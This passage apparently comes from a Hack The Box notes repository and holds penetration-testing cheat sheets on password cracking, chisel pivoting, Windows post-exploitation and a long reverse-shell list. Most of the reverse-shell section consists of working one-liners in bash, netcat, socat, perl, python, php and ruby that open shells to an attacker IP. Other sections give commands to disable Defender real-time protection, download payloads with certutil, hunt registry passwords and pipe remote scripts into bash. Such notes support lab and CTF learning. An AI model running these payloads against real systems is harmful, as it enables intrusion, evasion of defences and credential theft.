\\> zipfile.hash\r\njohn --format=zip zipfile.hash --wordlist=/usr/share/wordlists/rockyou.txt\r\n```\r\n"
},
{
"path": "notes/Pivoting.md",
"content": "### Network Pivoting\n\n\n![](\"https://miro.medium.com/max/700/1*exRPwGYJpGv6eESldShwzQ.png\"/)
\nImage from Vickie Li's post
\n\n**Summary:**\n - Network pivoting is the process of accessing an internal machine with the help of the compromised machine.\n - Connection lies between the compromised machine and the internal machine, and no direct connection will be available from the attacker machine to the internal machine\n - So in order to access the internal machine, we will make use of the compromised machine which has access to the internal machine\n\n**Dynamic Port Forwarding:**\n```bash\nDynamic Port Forwarding is the third major method of port redirection with SSH. \nWhere as previously both local and remote port forwarding allowed interaction with a single port, \ndynamic allows a full range of TCP communication across a range of ports. \nThe tool proxychains is also used to force any program you wish to use through the dynamic proxy.\n```\n\n**Requirements:** \n- To directly access the internal machine from the attacker machine, we can make the compromised machine as a proxy server and make all our requests to go via the compromised server to the internal machine\n- To perform this we need an `ssh / chisel service` and `proxychains` in attacker machine\n- If chisel is not available in the target machine, [chisel](https://github.com/jpillora/chisel/releases/tag/v1.7.4) release page\n\n**Procedure:**\n- Transfer the `chisel` binary to the compromised machine\n- On the Attacker machine:\n```bash\n# attacker IP: 192.168.1.1\n# syntax: ./chisel server -p {port} --reverse\n./chisel server -p 1337 --reverse\n```\n- On the compromised machine\n```bash\n# syntax: chisel client {attacker IP}:{port on chisel server} R:socks\n./chisel client 192.168.1.1:1337 R:socks # on a debian based machine\nchisel.exe client 192.168.1.1:1337 R:socks # on a windows machine\n```\n- On successful connection, the chisel server running on the attacker machine will pop the message\n```bash\n2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening\n```\n- The message implies that the connection is made via a socks proxy on the port `1080` which is a default proxy for the chisel\n- Add the following line in the `/etc/proxychains.conf`\n```bash\nsocks5 127.0.0.1 1080\n```\n- Now Whenever a command is executed in the attacker machine with mentioning the proxychains, \n```bash\nkali -> proxychains:1080 -> compromised_machine:1080 -> request for accessing from internal_machine -> internal_machine:80\n```\n\n\n![](\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/Pivoting.jpg\"/)
\nImage by cyberwr3nch
\n\n\n**Syntax:**\n```bash\n# nmap port scan\nproxychains nmap -p22,80,8080,21,443,445 -sT internal_machinesIP\n\n# opening internal_machine webserver\nproxychains firefox internal_machinesIP:80\n```\n\n### Live Example\n- Machines used, bucket and Jewel from [htb](https://hackthebox.eu)\n\n\n![](\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/pivoting-log.jpg\"/)
\nImage by cyberwr3nch
\n\n- Summary of the pivot\n\n\n![](\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/pivot-summary.jpg\"/)
\nImage by cyberwr3nch
\n\nThanks @adithyan-ak for binding me in
\n"
},
{
"path": "notes/PostExploitationCommands.md",
"content": "### Command Reference\r\n| Description | Unix | CMD | Powershell |\r\n| -- | -- | -- | -- |\r\n| User Logged in | whoami | echo %username% | $env:username|\r\n| | | | [System.Security.Principal.WindowsIdentity]::GetCurrent().Name |\r\n| Change Directory | cd \\ | cd \\ | Set-Location \\ |\r\n| Lis the directory | ls | dir | Get-ChildItem |\r\n| View file contents | cat \\ | type \\ | Get-Content \\ |\r\n| Move files | mv \\ \\ | move \\ \\ | Move-Item \\ \\ |\r\n| Clear Screen | clear | cls | Clear-Host |\r\n| Copy files | cp \\ \\ | copy \\ \\ | Copy-Item \\ \\ | \r\n| Delete files | rm \\ | del \\ | Remove-Item \\|\r\n| Web Requests | curl \\ | | Invoke-WebRequest \\ |\r\n| Supress Error messages | cd /Windows32/System 2>/dev/null | cat /etc/shadow 2>nul | Get-Content /etc/passwd -ErrorAction SilentlyContinue |\r\n\r\n### Network monitoring\r\n\r\n```bash\r\n# network modules info and IPs\r\nifconfig\r\nipaddr\r\n# shows the tcp connection\r\nnetstat -antp \r\nss -antp \r\n#netstat -ano ; 0.0.0.0:445 = implies, SMB service is running within the machine and not open for others\r\n#so it is best to perform port forwading and checking those services locally\r\n# windows\r\nnetstat -antp \r\nipconfig \r\n```\r\n\r\n### Windows Post Exploit\r\n### Powershell \r\n\r\n#### Get to know the current user, which you are logged in \r\n\r\n```powershell\r\n# system_name\\user_name\r\n[System.Security.Principal.WindowsIdentity]::GetCurrent().Name\r\n\r\n# user name & system name\r\n$env:UserName\r\n$env:UserDomain\r\n\r\n# find exe's in the current directory\r\n# -erroraction 'silentlycontinue' similar to 2>/dev/null\r\nGet-ChildItem -Filter \"*.exe\" -Recurse -erroraction 'silentlycontinue' \r\n```\r\n\r\n#### Disable RealTimeProtection\r\n\r\n```powershell\r\n#disables real time protection\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\n\r\n#enables real time protection\r\nSet-MpPreference -DisableRealtimeMonitoring $false\r\n```\r\n\r\n### CMD Commands\r\n\r\n#### Normal CMD\r\n\r\n```powershell\r\n# get current username\r\nwhoami\r\n\r\n# get system information\r\nsysteminfo\r\n\r\n# wget for windows\r\ncertutil -urlcache -f http://iamserver:port/xxxx.exe xxxx.exe\r\n\r\n# grep() for os name\r\nsysteminfo | findstr /C:\"OS Name\"\r\n\r\n# locate() for files\r\nfindstr /si password *.txt *.ini *.config *.xml *.bat\r\n\r\n# locate *.exe's\r\ndir /s /b *.exe\r\nwhere *.exe\r\n\r\n# get the hostname\r\nhostname\r\n\r\n# know the priviledges we have\r\n# token impresonate attacks can be donw with this privs\r\nwhoami /priv\r\n\r\n# know all the users in the machine\r\nnet user \r\n\r\n# Obtain information about the specific user\r\nnet user \r\n\r\n# Obtain users belongs to a specific groups\r\n# users belonging to the sudo groups\r\nnet localgroup administrators / \r\n\r\n# get to know network\r\nipconfig\r\nipconfig /all\r\n\r\n# internal network services\r\nnetstat -ano \r\n\r\n# get to know antivirus\r\nsc query windefend\t#know about windows defender status (up / down)\r\nsc queryex type= service #brings all the running services in the machine\r\n\r\n# get to know about the firewall \r\nnetsh show firewall state\r\n\r\n# Search for passwords in registry\r\nreg query HKLM /f password /t REG_SZ /s\r\n\r\n# port forward using plink.exe -l user -pw password for the user \r\nplink -l root -pw -R PORT:127.0.0.1:PORT 10.10.x.x\r\n\r\n# search for binaries in the machine, like whereis in linux\r\n# rn searching for powershell.exe in C:\\Window\\System32\r\nwhere /R C:\\windows\\System32 powershell.exe\r\n\r\n# look for stored credentials in the machine\r\ncmdkey /list \r\n\r\n# run as commands, when the creds for the user is stored which can be confirmed with cmdkey /list\r\nrunas.exe /user:domain\\UserName /savecred \"C:\\Windows\\System32\\cmd.exe /c Type C:\\Users\\UserName\\Desktop\\(user|root).txt > C:\\Users\\lowUser\\root.txt\"\r\n\r\n# if SeImpersonate Priviledges is available, use Printspoof\r\n# https://github.com/itm4n/PrintSpoofer\r\nPrintSpoofer.exe -i -c cmd\r\n```\r\n\r\n#### CMD commands when wmic is available\r\n\r\n```powershell\r\n# updation list\r\nwmic qfc get Caption,Description,HotFixID,InstalledOn\r\n\r\n# list disks with wmic\r\nwmic logicaldisk get caption,description,providenBane\r\n\r\n```\r\n\r\n#### When Port forwarding:\r\n\r\n- In the linux machine\r\n\r\n```bash\r\n# check ssh installation\r\nsudo apt install ssh\r\n# for a normal user, the ssh login will be smooth \r\n# for a root user, edit the sshd.config\r\n# change from #PermitRootLogin prohibit-password -> PermitRootLogin yes\r\nvi /etc/ssh/sshd_config\r\n# start the ssh service\r\nsudo service ssh start\r\n# check the port forwarded service\r\nnetstat -ano\r\n# after forwading the port, if user creds are available try winexe, 127.0.0.1 is given since the particular port is forwarded to out local machine\r\nwinexe -U Administrator% //127.0.0.1 \"cmd.exe\"\r\n\r\n```\r\n\r\n#### Resource\r\n\r\n##### \\*.exe\r\n\r\n- [winPEAS.exe](\"https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS\")\r\n- [Seatbelt.exe](\"https://github.com/GhostPack/Seatbelt\")\r\n- [Watson.exe](\"https://github.com/rasta-mouse/Watson\")\r\n- [SharpUp.exe](\"https://github.com/GhostPack/SharpUp\")\r\n\r\n##### \\*.ps1\r\n\r\n- [Sherlock.ps1](\"https://github.com/rasta-mouse/Sherlock\")\r\n- [PowerUp.ps1](\"https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp\")\r\n- [Jaws-enum.ps1](\"https://github.com/411Hall/JAWS\")\r\n- [PowerUp.ps1](\"https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1\")\r\n\r\n##### Misc\r\n\r\n- [Windows-exploit-suggester.py](\"https://github.com/AonCyberLabs/Windows-Exploit-Suggester\")\r\n- [Windows-Kernal-exploits](\"https://github.com/SecWiki/windows-kernal-exploits\")\r\n- [CVE's](\"https://github.com/nomi-sec/PoC-in-GitHub\")\r\n- [winexe](\"https://tools.kali.org/maintaining-access/winexe\")\r\n- [PsExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py\")\r\n- [SmbExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\")\r\n- [WmiExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\")\r\n- [Impersonate PrivEsc](\"https://github.com/gtworek/Priv2Admin\")\r\n"
},
{
"path": "notes/README.md",
"content": "# TableOfContents\r\n\r\n| File | Contents |\r\n| ---- | -------- |\r\n| [Active Directory](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Active%20Directory.md) | Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet |\r\n| [Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Commands.md) | port enum, ports, web enum, Login Bruteforce, sqlinj, File transfer|\r\n| [Docker Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Docker%20Commands.md) | installation, building, pulling, updating, deleting, listing, cheatsheet, run with ports open |\r\n| [Git Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Git%20Commands.md) | clone, commit, push, pull, add, log, deleted file, checkout | \r\n| [Password Cracking](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Password%20Cracking.md) | hashcat, john, hashexamples, zip file cracking |\r\n| [Pivoting](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Pivoting.md) | POST Exploitation, Pivoting, Chisel |\r\n| [Post Exploitation](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/PostExploitationCommands.md) | current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic | \r\n| [Regular Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Regular%20Commands.md) | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch |\r\n| [Reverse Shells](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Reverse%20Shell.md) | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners |\r\n| [Reversing](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Reversing.md)| GDB, Radare |"
},
{
"path": "notes/Regular Commands.md",
"content": "### Post \\ Pre Exploitation\r\n\r\n- [ls](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#ls)\r\n- [Grep](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#grep)\r\n- [AWK](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#awk)\r\n- [Curl](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#curl)\r\n- [wget](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#wget)\r\n- [Compression and decompression of files](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#compressing-and-decompressing)\r\n- [Find](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#find)\r\n- [xclip](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#xclip)\r\n- [Misc](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#misc)\r\n- [bashLoops](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#bash-loops)\r\n- [sed](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#sed)\r\n- [tr](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#tr)\r\n- [tail](#tail)\r\n- [watch](#watch)\r\n\r\n\r\n#### ls\r\n```bash\r\n# list files\r\nls\r\n\r\n# list hidden files\r\nls -la\r\n\r\n# list files with human readable size\r\nla -sh\r\n```\r\n\r\n#### Grep\r\n```bash\r\n# search for the files that contains the phrase password in it\r\ngrep -ir password\r\ngrep -iRl \"password\" ./\r\n\r\n# exclude multiple strings\r\ngrep -Ev 'exclude1 | exclude 2' filename.txt\r\n\r\n# obtain only lines starting with small letters\r\ngrep -v '[A-Z]' users.txt\r\n```\r\n\r\n\r\n#### AWK\r\n```bash\r\n# simple grab based on spaces, damnedsec cyberwr3nch hackthebox\r\nawk '{print $1}' # output damnedsec\r\n\r\n# multiple field seperator, obtain things only with in the delimeter\r\n# contents of the file-> user: cyberwr3nch: damnedsec;123\r\nawk -F: '{print $3}' users.txt # output damnedsec;123\r\n\r\n# obatain the first occurance with awk\r\nawk -F ':' \"/1/ {print $1}\"\r\n\r\n# contents of users.txt -> user:[BLACKFIELD764430] rid:[0x451], \r\nawk -F\"[][]\" '{print $2}' users.txt # output: BLACKFIELD764430\r\n\r\n# obtain contents from a specific line\r\n# where x is the line number\t\r\nawk 'NR==x {print $1}'\r\n\r\n# print lines form a specific line to the end of the file\r\nawk 'NR>x' users.txt\r\n\r\n# omit all the blank lines in a file\r\nawk 'NF'\r\n```\r\n\r\n#### Curl\r\n```bash\r\n# make http, http2, http3 requests with curl\r\ncurl -vv http://10.10.10.10\r\ncurl --http2 http://10.10.10.10\r\ncurl --http3 http://10.10.10.10\r\n\r\n# obtain only the response header\r\ncurl --head http://10.10.10.10.\r\n\r\n# upload files via curl\r\ncurl --user \"{user}:{creds}\" --upload-file= \"http://10.10.10.10/upload_location\"\r\n\r\n# curl save the output\r\ncurl http://10.10.10.10 -o index.html\r\n\r\n# pipe the requesting files\r\ncurl http://10.10.10.10::lin(peas\\|enum).sh | bash\r\n```\r\n\r\n#### Wget\r\n```bash\r\n# download files with wget\r\nwget http://10.10.10.10/xxx.sh\r\n\r\n# run files without downloading\r\nwget -O - http://10.10.10.11::lin(peas\\|enum).sh\r\n```\r\n\r\n#### SED\r\n```bash\r\n# search and replace strings\r\ncat username.txt | sed s/{stringToBeChanged}/{replacementString}/g\r\n\r\n# replace the last ',' with a null character\r\ncat usernames.txt | sed s/,$//\r\n\r\n# add \\x after every two characters, the .. denotes the two characters, \\x&, adds \\x and & doesnt delete the characters that were before\r\ncat hexpayload.txt | sed 's/../\\\\x&/g'\r\n\r\n# replace something in a file, replace the last occurance of , in the intel_update.log file ( in each line)\r\nsed -i 's/,$/\\]/' intel_update.log\r\n\r\n# replace only the last occurance of , at the end of the line in the end of the file ( make changes only in the last line)\r\n# the $ before s/,$/\\]/ metions the last line of the file\r\nsed -i '$ s/,$/\\]/' intel_update.log\r\n\r\n# delete empty lines in a file\r\ncat test.txt | sed -r '/^\\s*$/d'\r\n\r\n# use -i when a modification needs to be done on the file\r\n# use -r when the modification has to be done on the output alone\r\n```\r\n\r\n#### tr\r\n```bash\r\n# translate new lines '\\n' into ','; used in HTB nmap\r\ncat usernames.txt | tr '\\n' ','\r\n```\r\n\r\n\r\n#### Find\r\n```bash\r\n# find with file names\r\nfind . -name user.txt \r\n\r\n# find and execute\r\nfind . -name '*.txt' -exec cat \"{}\" \\;\r\n\r\n# {} is used as the place holder and tells the follwing to as an argument\r\n# find directories with the specified name and execute the command\r\nfind . -type d -name uploads -exec rm -rf \"{}\" ';'\r\n\r\n# find and copy files \r\nfind -name 'file.ext' -exec cp \"{}\" \\;\r\n\r\n# find the recently modified files\r\n# maxdepth - sub directories, newermt - timestamp\r\nfind . -maxdepth 1 -newermt \"2016-12-06\"\r\n\r\n# find files with specific string in it\r\nfind . -type f -print0 | xargs -0 -e grep -niH -e \"your common word to search\"\r\n```\r\n\r\n#### Compressing and Decompressing\r\n```bash\r\n# zip a folder with its contents\r\nzip -r -9 html.zip /var/www/html\r\n\r\n# unzip a zip file\r\nunzip html.zip\r\n\r\n# tar a file\r\ntar cvf html.tar html/\r\n\r\n# extract a .tar file\r\ntar -xvf html.tar \r\n\r\n# tar.gz a folder\r\ntar cvfz html.tar.gz html/\r\n\r\n# unzip a *.tar.gz file\r\ntar -xzvf html.tar.gz\r\n\r\n# unzip rar file\r\nunrar x html.rar\r\n```\r\n\r\n#### Xclip\r\n```bash\r\n# installation\r\nsudo apt-get install xclip\r\n\r\n# copying contents from a file and pasting it with 'mouse scroll button'\r\ncat user.txt | xclip\r\n\r\n# copying file and using cttl + v for pasting\r\ncat user.txt | xclip -sel clip\r\ncat user.txt | xclip -selection clipboard\r\n\r\n# copy the contents in the primary clipboard\r\ncat user.txt | xclip -selection primary\r\n```\r\n\r\n#### Misc\r\n```bash\r\n# monitor, repeat the same command for a period of time\r\n# ls -la every 1 sec on a dir\r\nwatch -n 1 'ls -la'\r\n```\r\n\r\n#### Bash Loops\r\n```bash\r\n# for loop that adds payload += in each line of the file\r\nfor i in $(cat hexdata); do echo \"payload += b'$i'\"; done\r\n```\r\n\r\n#### Tail \r\n```bash\r\n# view only last line of the file\r\ntail -1 \r\n\r\n# view last 7 lines from the file\r\ntail -n7 \r\n\r\n# omit the line specified before\r\ntail +7 # displays without the first seven lines of the file\r\n\r\n# update the contents of the file and provide the output\r\ntail -f \r\n```\r\n\r\n#### Watch \r\n```bash\r\n# repeat executing the command\r\nwatch \r\n \r\n# execute the commands in specific intervals\r\nwatch -n \r\n\r\n# highlight the differences in each execution ## Thanks copycookie.com \r\nwatch -n -d \r\n\r\n# exit on changes\r\nwatch -g \r\n```\r\n"
},
{
"path": "notes/Reverse Shell.md",
"content": "# Reverse Shells\n\n### Reverse Shells\n\n- [Bash TCP](#basht)\n- [Bash UDP](#bashu)\n- [Netcat](#nc)\n- [NCat](#ncat)\n- [Telnet](#tn)\n- [Socat](#scat)\n- [Perl](#perl)\n- [Python](#py)\n- [PHP](#php)\n- [Ruby](#rb)\n- [Secure Reverse Shell](#ssl)\n- [Powershell](#ps)\n- [AWK](#awk)\n- [TCLsh](#tsh)\n- [Java](#java)\n- [Lua](#lua)\n- [MSF Reverse Shell](#msf)\n- [XTerm](#xt)\n- [Magic Bytes](#image)\n\n#### Bash TCP \n```bash\n# on the victim machine\n# 1.syntax: bash -i >& /dev/tcp/{attacker IP}/{port} 0>&1\nbash -i >& /dev/tcp/10.10.14.32/1337 0>&1\n\n# 2.syntax: /bin/bash/ -i > dev/tcp/{attacker IP}/{port} 0<& 2>&1\n/bin/bash -i > /dev/tcp/10.10.14.32/1337 0<& 2>&1\n\n# 3.syntax: exec 5<>/dev/tcp/{attacker IP}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done\nexec 5<>/dev/tcp/10.10.14.32/1337;cat <&5 | while read line; do $line 2>&5 >&5; done\n\n# 4.syntax: exec /bin/sh 0&0 2>&0\nexec /bin/sh 0&0 2>&0\n\n# 5.syntax: 0<&196;exec 196<>/dev/tcp/{attacker IP}/{port}; sh <&196 >&196 2>&196\n0<&196;exec 196<>/dev/tcp/10.10.14.32/1337; sh <&196 >&196 2>&196\n\n# on attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Bash UDP \n```bash \n# on the victim machine\n# syntax: sh -i >& /dev/udp/{attacker IP}/{port} 0>&1\nsh -i >& /dev/udp/10.10.14.32/1337 0>&1\n\n# on attacker machine\n# syntax: nc -u -lvp {port}\nnc -u -lvp 1337\n```\n\n#### NetCat \n```bash\n# 1.syntax: nc -e /bin/sh {attacker IP} {port}\nnc -e /bin/bash 10.10.14.32 1337\n\n# 2.syntax: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {attacker IP} {port} >/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 1337 >/tmp/f\n\n# 3.syntax: mknod backpipe p && nc {attacker IP} {port} 0backpipe\nmknod backpipe p && nc 10.10.14.32 1337 0backpipe\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337 \n```\n\n#### NCat \n```bash\n# on the victim machine\n# 1.TCP Syntax: ncat {attacker IP} {port} -e /bin/bash\nncat 10.10.14.32 1337 -e /bin/bash\n\n# 2.UDP Syntax: ncat --udp {attacker IP} {port} -e /bin/bash\nncat --udp 10.10.14.32 1337 -e /bin/bash\n\n# on the attacker machine\n# 1.TCP Listen syntax: ncat -l {port}\nncat -l 1337\n\n# 2.UDP Listen syntax: ncat -u {port}\nncat -u 1337\n```\n\n#### Telnet \n```bash\n# on the victim machine\n# 1.syntax: rm -f /tmp/p; mknod /tmp/p p && telnet {attacker IP} {port} 0/tmp/p 2>&1\nrm -f /tmp/p; mknod /tmp/p p && telnet 10.10.14.32 1337 0/tmp/p 2>&1\n\n# 2.syntax: telnet {attacker IP} {port1} | /bin/bash | telnet {attacker IP} {port2}\ntelnet 10.10.14.32 1337 | /bin/bash | telnet 10.10.14.32 1338\n\n# 3.syntax: rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {attacker IP} {port} > f\nrm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.14.32 1337 > f\n\n# on the attacker machine\n# 1.syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n# 2.syntax: nc -lvnp {port1}; nc -lvnp {port 2}\nnc -lvnp 1337\nnc -lvnp 1338\n```\n\n#### Socat \n```bash\n# on the attacker machine\n# syntax: socat file:`tty`,raw,echo=0 TCP-L:{port}\nsocat file:`tty`,raw,echo=0 TCP-L:1337\n\n# on the victm machine\n# 1.syntax: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{attacker IP}:{port}\n./socat tcp:: exec:'bash -li',pty,stderr,setsid,sigint,sane \n\n# 2.syntax: socat tcp-connect:{attacker IP}:{port} exec:\"bash -li\",pty,stderr,setsid,sigint,sane\nsocat tcp-connect:10.10.14.32:1337 exec:\"bash -li\",pty,stderr,setsid,sigint,sane\n\n# 3.Oneliner syntax: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{attacker IP}:{port}\nwget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.32:1337\n\n#============================================================================#\n# simple reverese shell\n# on the compromised machine\nsocat TCP-L: EXEC=/bin/bash # execute /bin/bash on conenction\n\n# on the attacker machine\nsocat TCP:: - \n\n# \n\n\n# Pivoting with socat\n# machine we want to access (Machine A)\nsocat TCP-L:1234 EXEC:/bin/bash\n\n# machine we have access to (pivot point- Machine B)\nsocat TCP-L:3333 TCP::1234 \n\n# attacker machine (our machine)\nsocat TCP::3333 - \n\n# encrypted reverse shells will prevent anyone from spying and used to evade IDS\n\n# On the attacker machine\n## Generate a certificate\nopenssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.cert \n# on creating values will be asked which can be left blank\n# shell.key and shell.cert will be generated\n# merge the key and cert file to generate a pam file\ncat shell.key shell.crt > shell.pem\n# the generated certificate must be used on whichever device is listening for the connection\nsocat openssl-listen:4444,cert=shell.pem,verify=0 -\n\n# on the victim machine\nsocat openssl-connect::4444,verify=0 EXEC:/bin/bash\n\n# poor interactive shell will be obtained\n\n```bash\n# compromized machine\nββββ[toor@parrot]β[/dev/shm] \nββββΌ $socat openssl-listen:1234,cert=shell.pem,verify=0 exec:/bin/bash\n```\n\n```bash\n# attackker machine \nβββββ[kali@kali]β[/opt/binaries]\nββββΌ $socat openssl-connect:192.168.43.181:1234,verify=0 -\nid\nuid=1000(toor) gid=1000(toor) groups=1000(toor)\n\n\n# =================================================================================================#\n# fully interactive encrypted shell\n# on the attacker machine\nsocat `tty`,raw,echo=0 openssl-listen:1234,cert=shell.pem,verify=0\n\n# on the victim machine\nsocat openssl-connect::1234,verify=0 exec:bash,pty,stderr,setsid\n```\n\n#### Perl \n```bash \n# on the victim machine\n# 1.syntax: perl -e 'use Socket;$i=\"{attacker IP}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\nperl -e 'use Socket;$i=\"10.10.14.32\";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n\n# 2.syntax: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{attacker IP}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\nperl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"10.10.14.32:1337\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n\n# 3. Works only on windows machine: perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{attacker IP}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\nperl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"10.10.14.32:1337\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n\n# on the attacker machine \n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n```\n\n#### Python \n```bash\n# on the victim machine\n# IPv4 Connection: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{attacker IP}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.32\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n\n# IPv6 Connection: python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"{IPv6 attacker IP}\",{port},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\"/bin/sh\");'\npython -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:2::125c\",1337,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\"/bin/sh\");'\n\n# on the attacker machine\n# 1.syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n# 2.IPv6 Connection Listenting: wget http://ftp.cn.debian.org/debian/pool/main/n/nc6/netcat6_1.0-8_amd64.deb; dpkg -i ./netcat6_1.0-8_amd64.deb; netcat -6 -l {port} \nwget http://ftp.cn.debian.org/debian/pool/main/n/nc6/netcat6_1.0-8_amd64.deb; dpkg -i ./netcat6_1.0-8_amd64.deb; netcat -6 -l 1337\n```\n\n#### PHP \n```bash\n# on the victim machine\n# 1.syntax: php -r '$sock=fsockopen(\"{attacker IP}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'\nphp -r '$sock=fsockopen(\"10.10.14.32\",1337);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n\n# 2.syntax: php -r '$s=fsockopen(\"{attacker IP}\",{port});$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s),$pipes);'\nphp -r '$s=fsockopen(\"10.10.14.32\",1337);$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s),$pipes);'\n\n# 3.Syntax: \n\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Ruby \n```bash\n# on the victim machine\n# 1.syntax: ruby -rsocket -e'f=TCPSocket.open(\"{attacker IP}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\nruby -rsocket -e'f=TCPSocket.open(\"10.10.14.32\",1337).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n\n# 2.Windows Only Syntax: ruby -rsocket -e 'c=TCPSocket.new(\"{attacker IP}\",\"{port}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\nruby -rsocket -e 'c=TCPSocket.new(\"10.10.14.32\",\"1337\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Secure Reverse Shell \n```bash\n# on the victim machine\n# syntax: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client 